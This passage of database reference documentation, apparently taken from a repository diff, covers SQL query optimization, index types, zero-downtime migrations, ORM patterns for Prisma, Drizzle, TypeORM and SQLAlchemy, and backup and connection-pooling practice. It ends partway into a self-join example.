1. **Run EXPLAIN ANALYZE** (PostgreSQL) or **EXPLAIN FORMAT=JSON** (MySQL)
2. **Identify the costliest node** — Seq Scan on large tables, Nested Loop with high row estimates
3. **Check for missing indexes** — sequential scans on filtered columns
4. **Look for estimation errors** — planned vs actual rows divergence signals stale statistics
5. **Evaluate JOIN order** — ensure the smallest result set drives the join
### Index Recommendation Checklist
- Columns in WHERE clauses with high selectivity
- Columns in JOIN conditions (foreign keys)
- Columns in ORDER BY when combined with LIMIT
- Composite indexes matching multi-column WHERE predicates (most selective column first)
- Partial indexes for queries with constant filters (e.g., `WHERE status = 'active'`)
- Covering indexes to avoid table lookups for read-heavy queries
### Query Rewriting Patterns
| Anti-Pattern | Rewrite |
|-------------|---------|
| `SELECT * FROM orders` | `SELECT id, status, total FROM orders` (explicit columns) |
| `WHERE YEAR(created_at) = 2025` | `WHERE created_at >= '2025-01-01' AND created_at < '2026-01-01'` (sargable) |
| Correlated subquery in SELECT | LEFT JOIN with aggregation |
| `NOT IN (SELECT ...)` with NULLs | `NOT EXISTS (SELECT 1 ...)` |
| `UNION` (dedup) when not needed | `UNION ALL` |
| `LIKE '%search%'` | Full-text search index (GIN/FULLTEXT) |
| `ORDER BY RAND()` | Application-side random sampling or `TABLESAMPLE` |
### N+1 Detection
**Symptoms:**
- Application loop that executes one query per parent row
- ORM lazy-loading related entities inside a loop
- Query log shows hundreds of identical SELECT patterns with different IDs
**Fixes:**
- Use eager loading (`include` in Prisma, `joinedload` in SQLAlchemy)
- Batch queries with `WHERE id IN (...)`
- Use DataLoader pattern for GraphQL resolvers
### Static Analysis Tool
```bash
python scripts/query_optimizer.py --query "SELECT * FROM orders WHERE status = 'pending'" --dialect postgres
python scripts/query_optimizer.py --query queries.sql --dialect mysql --json
```
> See references/optimization_guide.md for EXPLAIN plan reading, index types, and connection pooling.
---
## Migration Generation
### Zero-Downtime Migration Patterns
**Adding a column (safe)**
```sql
-- Up
ALTER TABLE users ADD COLUMN phone VARCHAR(20);
-- Down
ALTER TABLE users DROP COLUMN phone;
```
**Renaming a column (expand-contract)**
```sql
-- Step 1: Add new column
ALTER TABLE users ADD COLUMN full_name VARCHAR(255);
-- Step 2: Backfill
UPDATE users SET full_name = name;
-- Step 3: Deploy app reading both columns
-- Step 4: Deploy app writing only new column
-- Step 5: Drop old column
ALTER TABLE users DROP COLUMN name;
```
**Adding a NOT NULL column (safe sequence)**
```sql
-- Step 1: Add nullable
ALTER TABLE orders ADD COLUMN region VARCHAR(50);
-- Step 2: Backfill with default
UPDATE orders SET region = 'unknown' WHERE region IS NULL;
-- Step 3: Add constraint
ALTER TABLE orders ALTER COLUMN region SET NOT NULL;
ALTER TABLE orders ALTER COLUMN region SET DEFAULT 'unknown';
```
**Index creation (non-blocking, PostgreSQL)**
```sql
CREATE INDEX CONCURRENTLY idx_orders_status ON orders (status);
```
### Data Backfill Strategies
- **Batch updates** — process in chunks of 1000-10000 rows to avoid lock contention
- **Background jobs** — run backfills asynchronously with progress tracking
- **Dual-write** — write to old and new columns during transition period
- **Validation queries** — verify row counts and data integrity after each batch
### Rollback Strategies
Every migration must have a reversible down script. For irreversible changes:
1. **Backup before execution**`pg_dump` the affected tables
2. **Feature flags** — application can switch between old/new schema reads
3. **Shadow tables** — keep a copy of the original table during migration window
### Migration Generator Tool
```bash
python scripts/migration_generator.py --change "add email_verified boolean to users" --dialect postgres --format sql
python scripts/migration_generator.py --change "rename column name to full_name in customers" --dialect mysql --format alembic --json
```
---
## Multi-Database Support
### Dialect Differences
| Feature | PostgreSQL | MySQL | SQLite | SQL Server |
|---------|-----------|-------|--------|------------|
| UPSERT | `ON CONFLICT DO UPDATE` | `ON DUPLICATE KEY UPDATE` | `ON CONFLICT DO UPDATE` | `MERGE` |
| Boolean | Native `BOOLEAN` | `TINYINT(1)` | `INTEGER` | `BIT` |
| Auto-increment | `SERIAL` / `GENERATED` | `AUTO_INCREMENT` | `INTEGER PRIMARY KEY` | `IDENTITY` |
| JSON | `JSONB` (indexed) | `JSON` | Text (ext) | `NVARCHAR(MAX)` |
| Array | Native `ARRAY` | Not supported | Not supported | Not supported |
| CTE (recursive) | Full support | 8.0+ | 3.8.3+ | Full support |
| Window functions | Full support | 8.0+ | 3.25.0+ | Full support |
| Full-text search | `tsvector` + GIN | `FULLTEXT` index | FTS5 extension | Full-text catalog |
| LIMIT/OFFSET | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `LIMIT n OFFSET m` | `OFFSET m ROWS FETCH NEXT n ROWS ONLY` |
### Compatibility Tips
- **Always use parameterized queries** — prevents SQL injection across all dialects
- **Avoid dialect-specific functions in shared code** — wrap in adapter layer
- **Test migrations on target engine** — `information_schema` varies between engines
- **Use ISO date format** — `'YYYY-MM-DD'` works everywhere
- **Quote identifiers** — use double quotes (SQL standard) or backticks (MySQL)
---
## ORM Patterns
### Prisma
**Schema definition**
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
posts Post[]
createdAt DateTime @default(now())
}
model Post {
id Int @id @default(autoincrement())
title String
author User @relation(fields: [authorId], references: [id])
authorId Int
}
```
**Migrations**: `npx prisma migrate dev --name add_user_email`
**Query API**: `prisma.user.findMany({ where: { email: { contains: '@' } }, include: { posts: true } })`
**Raw SQL escape hatch**: `prisma.$queryRaw\`SELECT * FROM users WHERE id = ${userId}\``
### Drizzle
**Schema-first definition**
```typescript
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: text('name'),
createdAt: timestamp('created_at').defaultNow(),
});
```
**Query builder**: `db.select().from(users).where(eq(users.email, email))`
**Migrations**: `npx drizzle-kit generate:pg` then `npx drizzle-kit push:pg`
### TypeORM
**Entity decorators**
```typescript
@Entity()
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
email: string;
@OneToMany(() => Post, post => post.author)
posts: Post[];
}
```
**Repository pattern**: `userRepo.find({ where: { email }, relations: ['posts'] })`
**Migrations**: `npx typeorm migration:generate -n AddUserEmail`
### SQLAlchemy
**Declarative models**
```python
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True, nullable=False)
name = Column(String(255))
posts = relationship('Post', back_populates='author')
```
**Session management**: Always use `with Session() as session:` context manager
**Alembic migrations**: `alembic revision --autogenerate -m "add user email"`
> See references/orm_patterns.md for side-by-side comparisons and migration workflows per ORM.
---
## Data Integrity
### Constraint Strategy
- **Primary keys** — every table must have one; prefer surrogate keys (serial/UUID)
- **Foreign keys** — enforce referential integrity; define ON DELETE behavior explicitly
- **UNIQUE constraints** — for business-level uniqueness (email, slug, API key)
- **CHECK constraints** — validate ranges, enums, and business rules at the DB level
- **NOT NULL** — default to NOT NULL; make nullable only when genuinely optional
### Transaction Isolation Levels
| Level | Dirty Read | Non-Repeatable Read | Phantom Read | Use Case |
|-------|-----------|-------------------|-------------|----------|
| READ UNCOMMITTED | Yes | Yes | Yes | Never recommended |
| READ COMMITTED | No | Yes | Yes | Default for PostgreSQL, general OLTP |
| REPEATABLE READ | No | No | Yes (InnoDB: No) | Financial calculations |
| SERIALIZABLE | No | No | No | Critical consistency (billing, inventory) |
### Deadlock Prevention
1. **Consistent lock ordering** — always acquire locks in the same table/row order
2. **Short transactions** — minimize time between first lock and commit
3. **Advisory locks** — use `pg_advisory_lock()` for application-level coordination
4. **Retry logic** — catch deadlock errors and retry with exponential backoff
---
## Backup & Restore
### PostgreSQL
```bash
# Full backup
pg_dump -Fc --no-owner dbname > backup.dump
# Restore
pg_restore -d dbname --clean --no-owner backup.dump
# Point-in-time recovery: configure WAL archiving + restore_command
```
### MySQL
```bash
# Full backup
mysqldump --single-transaction --routines --triggers dbname > backup.sql
# Restore
mysql dbname < backup.sql
# Binary log for PITR: mysqlbinlog --start-datetime="2025-01-01 00:00:00" binlog.000001
```
### SQLite
```bash
# Backup (safe with concurrent reads)
sqlite3 dbname ".backup backup.db"
```
### Backup Best Practices
- **Automate** — cron or systemd timer, never manual-only
- **Test restores** — untested backups are not backups
- **Offsite copies** — S3, GCS, or separate region
- **Retention policy** — daily for 7 days, weekly for 4 weeks, monthly for 12 months
- **Monitor backup size and duration** — sudden changes signal issues
---
## Anti-Patterns
| Anti-Pattern | Problem | Fix |
|-------------|---------|-----|
| `SELECT *` | Transfers unnecessary data, breaks on schema changes | Explicit column list |
| Missing indexes on FK columns | Slow JOINs and cascading deletes | Add indexes on all foreign keys |
| N+1 queries | 1 + N round trips to database | Eager loading or batch queries |
| Implicit type coercion | `WHERE id = '123'` prevents index use | Match types in predicates |
| No connection pooling | Exhausts connections under load | PgBouncer, ProxySQL, or ORM pool |
| Unbounded queries | No LIMIT risks returning millions of rows | Always paginate |
| Storing money as FLOAT | Rounding errors | Use `DECIMAL(19,4)` or integer cents |
| God tables | One table with 50+ columns | Normalize or use vertical partitioning |
| Soft deletes everywhere | Complicates every query with `WHERE deleted_at IS NULL` | Archive tables or event sourcing |
| Raw string concatenation | SQL injection | Parameterized queries always |
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| **database-designer** | Schema architecture, normalization analysis, ERD generation |
| **database-schema-designer** | Visual ERD modeling, relationship mapping |
| **migration-architect** | Complex multi-step migration orchestration |
| **api-design-reviewer** | Ensuring API endpoints align with query patterns |
| **observability-platform** | Query performance monitoring, slow query alerts |

View File

@@ -0,0 +1,330 @@
# Query Optimization Guide
How to read EXPLAIN plans, choose the right index types, understand query plan operators, and configure connection pooling.
---
## Reading EXPLAIN Plans
### PostgreSQL — EXPLAIN ANALYZE
```sql
EXPLAIN (ANALYZE, BUFFERS, FORMAT TEXT) SELECT * FROM orders WHERE status = 'paid' ORDER BY created_at DESC LIMIT 20;
```
**Sample output:**
```
Limit (cost=0.43..12.87 rows=20 width=128) (actual time=0.052..0.089 rows=20 loops=1)
-> Index Scan Backward using idx_orders_status_created on orders (cost=0.43..4521.33 rows=7284 width=128) (actual time=0.051..0.085 rows=20 loops=1)
Index Cond: (status = 'paid')
Buffers: shared hit=4
Planning Time: 0.156 ms
Execution Time: 0.112 ms
```
**Key fields to check:**
| Field | What it tells you |
|-------|-------------------|
| `cost` | Estimated startup..total cost (arbitrary units) |
| `rows` | Estimated row count at that node |
| `actual time` | Real wall-clock time in milliseconds |
| `actual rows` | Real row count — compare against estimate |
| `Buffers: shared hit` | Pages read from cache (good) |
| `Buffers: shared read` | Pages read from disk (slow) |
| `loops` | How many times the node executed |
**Red flags:**
- `Seq Scan` on a large table with a WHERE clause — missing index
- `actual rows` >> `rows` (estimated) — stale statistics, run `ANALYZE`
- `Nested Loop` with high loop count — consider hash join or add index
- `Sort` with `external merge` — not enough `work_mem`, spilling to disk
- `Buffers: shared read` much higher than `shared hit` — cold cache or table too large for memory
### MySQL — EXPLAIN FORMAT=JSON
```sql
EXPLAIN FORMAT=JSON SELECT * FROM orders WHERE status = 'paid' ORDER BY created_at DESC LIMIT 20;
```
**Key fields:**
- `query_block.select_id` — identifies subqueries
- `table.access_type` — `ALL` (full scan), `ref` (index lookup), `range`, `index`, `const`
- `table.rows_examined_per_scan` — how many rows the engine reads
- `table.using_index` — covering index (no table lookup needed)
- `table.attached_condition` — the WHERE filter applied
**Access types ranked (best to worst):**
`system` > `const` > `eq_ref` > `ref` > `range` > `index` > `ALL`
---
## Index Types
### B-tree (default)
The workhorse index. Supports equality, range, prefix, and ORDER BY operations.
**Best for:** `=`, `<`, `>`, `<=`, `>=`, `BETWEEN`, `LIKE 'prefix%'`, `ORDER BY`, `MIN()`, `MAX()`
```sql
CREATE INDEX idx_orders_created ON orders (created_at);
```
**Composite B-tree:** Column order matters. The index is useful for queries that filter on a leftmost prefix of the indexed columns.
```sql
-- This index serves: WHERE status = ... AND created_at > ...
-- Also serves: WHERE status = ...
-- Does NOT serve: WHERE created_at > ... (without status)
CREATE INDEX idx_orders_status_created ON orders (status, created_at);
```
### Hash
Equality-only lookups. Faster than B-tree for exact matches but no range support.
**Best for:** `=` lookups on high-cardinality columns
```sql
-- PostgreSQL
CREATE INDEX idx_sessions_token ON sessions USING hash (token);
```
**Limitations:** No range queries, no ORDER BY, not WAL-logged before PostgreSQL 10.
### GIN (Generalized Inverted Index)
For multi-valued data: arrays, JSONB, full-text search vectors.
```sql
-- JSONB containment
CREATE INDEX idx_products_tags ON products USING gin (tags);
-- Query: SELECT * FROM products WHERE tags @> '["sale"]';
-- Full-text search
CREATE INDEX idx_articles_search ON articles USING gin (to_tsvector('english', title || ' ' || body));
```
### GiST (Generalized Search Tree)
For geometric, range, and proximity data.
```sql
-- Range type (e.g., date ranges)
CREATE INDEX idx_bookings_period ON bookings USING gist (during);
-- Query: SELECT * FROM bookings WHERE during && '[2025-01-01, 2025-01-31]';
-- PostGIS geometry
CREATE INDEX idx_locations_geom ON locations USING gist (geom);
```
### BRIN (Block Range INdex)
Tiny index for naturally ordered data (e.g., time-series append-only tables).
```sql
CREATE INDEX idx_events_created ON events USING brin (created_at);
```
**Best for:** Large tables where the indexed column correlates with physical row order. Much smaller than B-tree but less precise.
### Partial Index
Index only rows matching a condition. Smaller and faster for targeted queries.
```sql
-- Only index active users (skip millions of inactive)
CREATE INDEX idx_users_active_email ON users (email) WHERE status = 'active';
```
### Covering Index (INCLUDE)
Store extra columns in the index to avoid table lookups (index-only scans).
```sql
-- PostgreSQL 11+
CREATE INDEX idx_orders_status ON orders (status) INCLUDE (total, created_at);
-- Query can be answered entirely from the index:
-- SELECT total, created_at FROM orders WHERE status = 'paid';
```
### Expression Index
Index the result of a function or expression.
```sql
CREATE INDEX idx_users_lower_email ON users (LOWER(email));
-- Query: SELECT * FROM users WHERE LOWER(email) = 'user@example.com';
```
---
## Query Plan Operators
### Scan operators
| Operator | Description | Performance |
|----------|-------------|-------------|
| **Seq Scan** | Full table scan, reads every row | Slow on large tables |
| **Index Scan** | B-tree lookup + table fetch | Fast for selective queries |
| **Index Only Scan** | Reads only the index (covering) | Fastest for covered queries |
| **Bitmap Index Scan** | Builds a bitmap of matching pages | Good for medium selectivity |
| **Bitmap Heap Scan** | Fetches pages identified by bitmap | Pairs with bitmap index scan |
### Join operators
| Operator | Description | Best when |
|----------|-------------|-----------|
| **Nested Loop** | For each outer row, scan inner | Small outer set, indexed inner |
| **Hash Join** | Build hash table on inner, probe with outer | Medium-large sets, no index |
| **Merge Join** | Merge two sorted inputs | Both inputs already sorted |
### Other operators
| Operator | Description |
|----------|-------------|
| **Sort** | Sorts rows (may spill to disk if work_mem exceeded) |
| **Hash Aggregate** | GROUP BY using hash table |
| **Group Aggregate** | GROUP BY on pre-sorted input |
| **Limit** | Stops after N rows |
| **Materialize** | Caches subquery results in memory |
| **Gather / Gather Merge** | Collects results from parallel workers |
---
## Connection Pooling
### Why pool connections?
Each database connection consumes memory (5-10 MB in PostgreSQL). Without pooling:
- Application creates a new connection per request (slow: TCP + TLS + auth)
- Under load, connection count spikes past `max_connections`
- Database OOM or connection refused errors
### PgBouncer (PostgreSQL)
The standard external connection pooler for PostgreSQL.
**Modes:**
- **Session** — connection assigned for entire client session (safest, least efficient)
- **Transaction** — connection returned to pool after each transaction (recommended)
- **Statement** — connection returned after each statement (cannot use transactions)
```ini
# pgbouncer.ini
[databases]
mydb = host=127.0.0.1 port=5432 dbname=mydb
[pgbouncer]
pool_mode = transaction
max_client_conn = 200
default_pool_size = 20
min_pool_size = 5
reserve_pool_size = 5
reserve_pool_timeout = 3
server_idle_timeout = 300
```
**Sizing formula:**
```
default_pool_size = num_cpu_cores * 2 + effective_spindle_count
```
For SSDs, start with `num_cpu_cores * 2` (typically 4-16 connections is optimal).
### ProxySQL (MySQL)
```ini
mysql_servers = ({ address="127.0.0.1", port=3306, hostgroup=0, max_connections=100 })
mysql_query_rules = ({ rule_id=1, match_pattern="^SELECT.*FOR UPDATE", destination_hostgroup=0 })
```
### Application-Level Pooling
Most ORMs and drivers include built-in pooling:
| Platform | Pool Configuration |
|----------|--------------------|
| **node-postgres** | `new Pool({ max: 20, idleTimeoutMillis: 30000 })` |
| **SQLAlchemy** | `create_engine(url, pool_size=20, max_overflow=5)` |
| **HikariCP (Java)** | `maximumPoolSize=20, minimumIdle=5, idleTimeout=300000` |
| **Prisma** | `connection_limit=20` in connection string |
### Pool Sizing Guidelines
| Metric | Guideline |
|--------|-----------|
| **Minimum** | Number of always-active background workers |
| **Maximum** | 2-4x CPU cores for OLTP; lower for OLAP |
| **Idle timeout** | 30-300 seconds (reclaim unused connections) |
| **Connection timeout** | 3-10 seconds (fail fast under pressure) |
| **Queue size** | 2-5x pool max (buffer bursts before rejecting) |
**Warning:** More connections does not mean better performance. Beyond the optimal point (usually 20-50), contention on locks, CPU, and I/O causes throughput to decrease.
---
## Statistics and Maintenance
### PostgreSQL
```sql
-- Update statistics for the query planner
ANALYZE orders;
ANALYZE; -- All tables
-- Check table bloat and dead tuples
SELECT relname, n_dead_tup, last_autovacuum, last_autoanalyze
FROM pg_stat_user_tables ORDER BY n_dead_tup DESC;
-- Identify unused indexes
SELECT indexrelname, idx_scan, pg_size_pretty(pg_relation_size(indexrelid)) AS size
FROM pg_stat_user_indexes
WHERE idx_scan = 0 AND indexrelname NOT LIKE '%pkey%'
ORDER BY pg_relation_size(indexrelid) DESC;
```
### MySQL
```sql
-- Update statistics
ANALYZE TABLE orders;
-- Check index usage
SELECT * FROM sys.schema_unused_indexes;
SELECT * FROM sys.schema_redundant_indexes;
-- Identify long-running queries
SELECT * FROM information_schema.processlist WHERE time > 10;
```
---
## Performance Checklist
Before deploying any query to production:
1. Run `EXPLAIN ANALYZE` and verify no unexpected sequential scans
2. Check that estimated rows are within 10x of actual rows
3. Verify index usage on all WHERE, JOIN, and ORDER BY columns
4. Ensure LIMIT is present for user-facing list queries
5. Confirm parameterized queries (no string concatenation)
6. Test with production-like data volume (not just 10 rows)
7. Monitor query time in application metrics after deployment
8. Set up slow query log alerting (> 100ms for OLTP, > 5s for reports)
---
## Quick Reference: When to Use Which Index
| Query Pattern | Index Type |
|--------------|-----------|
| `WHERE col = value` | B-tree or Hash |
| `WHERE col > value` | B-tree |
| `WHERE col LIKE 'prefix%'` | B-tree |
| `WHERE col LIKE '%substring%'` | GIN (full-text) or trigram |
| `WHERE jsonb_col @> '{...}'` | GIN |
| `WHERE array_col && ARRAY[...]` | GIN |
| `WHERE range_col && '[a,b]'` | GiST |
| `WHERE ST_DWithin(geom, ...)` | GiST |
| `WHERE col = value` (append-only) | BRIN |
| `WHERE col = value AND status = 'active'` | Partial B-tree |
| `SELECT a, b WHERE c = value` | Covering (INCLUDE) |

View File

@@ -0,0 +1,451 @@
# ORM Patterns Reference
Side-by-side comparison of Prisma, Drizzle, TypeORM, and SQLAlchemy patterns for common database operations.
---
## Schema Definition
### Prisma (schema.prisma)
```prisma
model User {
id Int @id @default(autoincrement())
email String @unique
name String?
role Role @default(USER)
posts Post[]
profile Profile?
createdAt DateTime @default(now())
updatedAt DateTime @updatedAt
@@index([email])
@@map("users")
}
model Post {
id Int @id @default(autoincrement())
title String
body String?
published Boolean @default(false)
author User @relation(fields: [authorId], references: [id], onDelete: Cascade)
authorId Int
tags Tag[]
createdAt DateTime @default(now())
@@index([authorId])
@@index([published, createdAt])
@@map("posts")
}
enum Role {
USER
ADMIN
MODERATOR
}
```
### Drizzle (schema.ts)
```typescript
import { pgTable, serial, varchar, text, boolean, timestamp, integer, pgEnum } from 'drizzle-orm/pg-core';
export const roleEnum = pgEnum('role', ['USER', 'ADMIN', 'MODERATOR']);
export const users = pgTable('users', {
id: serial('id').primaryKey(),
email: varchar('email', { length: 255 }).notNull().unique(),
name: varchar('name', { length: 255 }),
role: roleEnum('role').default('USER').notNull(),
createdAt: timestamp('created_at').defaultNow().notNull(),
updatedAt: timestamp('updated_at').defaultNow().notNull(),
});
export const posts = pgTable('posts', {
id: serial('id').primaryKey(),
title: varchar('title', { length: 255 }).notNull(),
body: text('body'),
published: boolean('published').default(false).notNull(),
authorId: integer('author_id').notNull().references(() => users.id, { onDelete: 'cascade' }),
createdAt: timestamp('created_at').defaultNow().notNull(),
}, (table) => ({
authorIdx: index('idx_posts_author').on(table.authorId),
publishedIdx: index('idx_posts_published').on(table.published, table.createdAt),
}));
```
### TypeORM (entities)
```typescript
import { Entity, PrimaryGeneratedColumn, Column, ManyToOne, OneToMany, CreateDateColumn, UpdateDateColumn, Index } from 'typeorm';
export enum Role { USER = 'USER', ADMIN = 'ADMIN', MODERATOR = 'MODERATOR' }
@Entity('users')
export class User {
@PrimaryGeneratedColumn()
id: number;
@Column({ unique: true })
@Index()
email: string;
@Column({ nullable: true })
name: string;
@Column({ type: 'enum', enum: Role, default: Role.USER })
role: Role;
@OneToMany(() => Post, post => post.author)
posts: Post[];
@CreateDateColumn()
createdAt: Date;
@UpdateDateColumn()
updatedAt: Date;
}
@Entity('posts')
@Index(['published', 'createdAt'])
export class Post {
@PrimaryGeneratedColumn()
id: number;
@Column()
title: string;
@Column({ nullable: true, type: 'text' })
body: string;
@Column({ default: false })
published: boolean;
@ManyToOne(() => User, user => user.posts, { onDelete: 'CASCADE' })
author: User;
@Column()
authorId: number;
@CreateDateColumn()
createdAt: Date;
}
```
### SQLAlchemy (models.py)
```python
import enum
from datetime import datetime
from sqlalchemy import Column, Integer, String, Text, Boolean, DateTime, Enum, ForeignKey, Index
from sqlalchemy.orm import relationship, DeclarativeBase
class Base(DeclarativeBase):
pass
class Role(enum.Enum):
USER = "USER"
ADMIN = "ADMIN"
MODERATOR = "MODERATOR"
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True, autoincrement=True)
email = Column(String(255), unique=True, nullable=False, index=True)
name = Column(String(255), nullable=True)
role = Column(Enum(Role), default=Role.USER, nullable=False)
posts = relationship('Post', back_populates='author', cascade='all, delete-orphan')
created_at = Column(DateTime, default=datetime.utcnow, nullable=False)
updated_at = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=False)
class Post(Base):
__tablename__ = 'posts'
__table_args__ = (
Index('idx_posts_published', 'published', 'created_at'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
title = Column(String(255), nullable=False)
body = Column(Text, nullable=True)
published = Column(Boolean, default=False, nullable=False)
author_id = Column(Integer, ForeignKey('users.id', ondelete='CASCADE'), nullable=False, index=True)
author = relationship('User', back_populates='posts')
created_at = Column(DateTime, default=datetime.utcnow, nullable=False)
```
---
## CRUD Operations
### Create
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.create({ data: { email, name } })` |
| **Drizzle** | `await db.insert(users).values({ email, name }).returning()` |
| **TypeORM** | `await userRepo.save(userRepo.create({ email, name }))` |
| **SQLAlchemy** | `session.add(User(email=email, name=name)); session.commit()` |
### Read (with filter)
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.findMany({ where: { role: 'ADMIN' }, orderBy: { createdAt: 'desc' } })` |
| **Drizzle** | `await db.select().from(users).where(eq(users.role, 'ADMIN')).orderBy(desc(users.createdAt))` |
| **TypeORM** | `await userRepo.find({ where: { role: Role.ADMIN }, order: { createdAt: 'DESC' } })` |
| **SQLAlchemy** | `session.query(User).filter(User.role == Role.ADMIN).order_by(User.created_at.desc()).all()` |
### Update
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.update({ where: { id }, data: { name } })` |
| **Drizzle** | `await db.update(users).set({ name }).where(eq(users.id, id))` |
| **TypeORM** | `await userRepo.update(id, { name })` |
| **SQLAlchemy** | `session.query(User).filter(User.id == id).update({User.name: name}); session.commit()` |
### Delete
| ORM | Pattern |
|-----|---------|
| **Prisma** | `await prisma.user.delete({ where: { id } })` |
| **Drizzle** | `await db.delete(users).where(eq(users.id, id))` |
| **TypeORM** | `await userRepo.delete(id)` |
| **SQLAlchemy** | `session.query(User).filter(User.id == id).delete(); session.commit()` |
---
## Relations and Eager Loading
### Prisma — include / select
```typescript
// Eager load posts with user
const user = await prisma.user.findUnique({
where: { id: 1 },
include: { posts: { where: { published: true }, orderBy: { createdAt: 'desc' } } },
});
// Nested create
await prisma.user.create({
data: {
email: 'new@example.com',
posts: { create: [{ title: 'First post' }] },
},
});
```
### Drizzle — relational queries
```typescript
const result = await db.query.users.findFirst({
where: eq(users.id, 1),
with: { posts: { where: eq(posts.published, true), orderBy: [desc(posts.createdAt)] } },
});
```
### TypeORM — relations / query builder
```typescript
// FindOptions
const user = await userRepo.findOne({ where: { id: 1 }, relations: ['posts'] });
// QueryBuilder for complex joins
const result = await userRepo.createQueryBuilder('u')
.leftJoinAndSelect('u.posts', 'p', 'p.published = :pub', { pub: true })
.where('u.id = :id', { id: 1 })
.getOne();
```
### SQLAlchemy — joinedload / selectinload
```python
from sqlalchemy.orm import joinedload, selectinload
# Eager load in one JOIN query
user = session.query(User).options(joinedload(User.posts)).filter(User.id == 1).first()
# Eager load in a separate IN query (better for collections)
users = session.query(User).options(selectinload(User.posts)).all()
```
---
## Raw SQL Escape Hatches
Every ORM should provide a way to execute raw SQL for complex queries:
| ORM | Pattern |
|-----|---------|
| **Prisma** | `` prisma.$queryRaw`SELECT * FROM users WHERE id = ${id}` `` |
| **Drizzle** | `db.execute(sql`SELECT * FROM users WHERE id = ${id}`)` |
| **TypeORM** | `dataSource.query('SELECT * FROM users WHERE id = $1', [id])` |
| **SQLAlchemy** | `session.execute(text('SELECT * FROM users WHERE id = :id'), {'id': id})` |
Always use parameterized queries in raw SQL to prevent injection.
---
## Transaction Patterns
### Prisma
```typescript
await prisma.$transaction(async (tx) => {
const user = await tx.user.create({ data: { email } });
await tx.post.create({ data: { title: 'Welcome', authorId: user.id } });
});
```
### Drizzle
```typescript
await db.transaction(async (tx) => {
const [user] = await tx.insert(users).values({ email }).returning();
await tx.insert(posts).values({ title: 'Welcome', authorId: user.id });
});
```
### TypeORM
```typescript
await dataSource.transaction(async (manager) => {
const user = await manager.save(User, { email });
await manager.save(Post, { title: 'Welcome', authorId: user.id });
});
```
### SQLAlchemy
```python
with Session() as session:
try:
user = User(email=email)
session.add(user)
session.flush() # Get user.id without committing
session.add(Post(title='Welcome', author_id=user.id))
session.commit()
except Exception:
session.rollback()
raise
```
---
## Migration Workflows
### Prisma
```bash
# Generate migration from schema changes
npx prisma migrate dev --name add_posts_table
# Apply in production
npx prisma migrate deploy
# Reset database (dev only)
npx prisma migrate reset
# Generate client after schema change
npx prisma generate
```
**Files:** `prisma/migrations/<timestamp>_<name>/migration.sql`
### Drizzle
```bash
# Generate migration SQL from schema diff
npx drizzle-kit generate:pg
# Push schema directly (dev only, no migration files)
npx drizzle-kit push:pg
# Apply migrations
npx drizzle-kit migrate
```
**Files:** `drizzle/<timestamp>_<name>.sql`
### TypeORM
```bash
# Auto-generate migration from entity changes (TypeORM 0.3+: pass the output path as an argument)
npx typeorm migration:generate src/migrations/AddPostsTable -d data-source.ts
# Create empty migration
npx typeorm migration:create src/migrations/CustomMigration
# Run pending migrations
npx typeorm migration:run -d data-source.ts
# Revert last migration
npx typeorm migration:revert -d data-source.ts
```
**Files:** `src/migrations/<timestamp>-<Name>.ts`
### SQLAlchemy (Alembic)
```bash
# Initialize Alembic
alembic init alembic
# Auto-generate migration from model changes
alembic revision --autogenerate -m "add posts table"
# Apply all pending
alembic upgrade head
# Revert one step
alembic downgrade -1
# Show current state
alembic current
```
**Files:** `alembic/versions/<hash>_<slug>.py`
---
## N+1 Prevention Cheat Sheet
| ORM | Lazy (N+1 risk) | Eager (fixed) |
|-----|-----------------|---------------|
| **Prisma** | Not accessing `include` | `include: { posts: true }` |
| **Drizzle** | Separate queries | `with: { posts: true }` |
| **TypeORM** | `@ManyToOne(() => ..., { lazy: true })` | `relations: ['posts']` or `leftJoinAndSelect` |
| **SQLAlchemy** | Default `lazy='select'` | `joinedload()` or `selectinload()` |
**Rule of thumb:** If you access a relation inside a loop, you have an N+1 problem. Always load relations before the loop.
---
## Connection Pooling
### Prisma
```
# In .env or connection string
DATABASE_URL="postgresql://user:pass@host/db?connection_limit=20&pool_timeout=10"
```
### Drizzle (with node-postgres)
```typescript
import { Pool } from 'pg';
const pool = new Pool({ max: 20, idleTimeoutMillis: 30000, connectionTimeoutMillis: 5000 });
const db = drizzle(pool);
```
### TypeORM
```typescript
const dataSource = new DataSource({
type: 'postgres',
extra: { max: 20, idleTimeoutMillis: 30000 },
});
```
### SQLAlchemy
```python
from sqlalchemy import create_engine
engine = create_engine('postgresql://user:pass@host/db', pool_size=20, max_overflow=5, pool_timeout=30)
```
---
## Best Practices Summary
1. **Always use migrations** — never modify production schemas by hand
2. **Eager load relations** — prevent N+1 in every list/collection query
3. **Use transactions** — group related writes to maintain consistency
4. **Parameterize raw SQL** — never concatenate user input into queries
5. **Connection pooling** — configure pool size matching your workload
6. **Index foreign keys** — ORMs often skip this; add manually if needed
7. **Review generated SQL** — enable query logging in development to catch inefficiencies
8. **Type-safe queries** — leverage TypeScript/Python typing for compile-time checks
9. **Separate read/write models** — use views or read replicas for heavy reporting queries
10. **Test migrations both ways** — always verify that down migrations actually reverse up migrations

View File

@@ -0,0 +1,406 @@
# SQL Query Patterns Reference
Common query patterns for everyday database operations. All examples use PostgreSQL syntax with dialect notes where they differ.
---
## JOIN Patterns
### INNER JOIN — matching rows in both tables
```sql
SELECT u.name, o.id AS order_id, o.total
FROM users u
INNER JOIN orders o ON o.user_id = u.id
WHERE o.status = 'paid';
```
### LEFT JOIN — all rows from left, matching from right
```sql
SELECT u.name, COUNT(o.id) AS order_count
FROM users u
LEFT JOIN orders o ON o.user_id = u.id
GROUP BY u.id, u.name;
```
Returns users even if they have zero orders.
### Self JOIN — comparing rows within the same table
```sql
-- Find employees who earn more than their manager
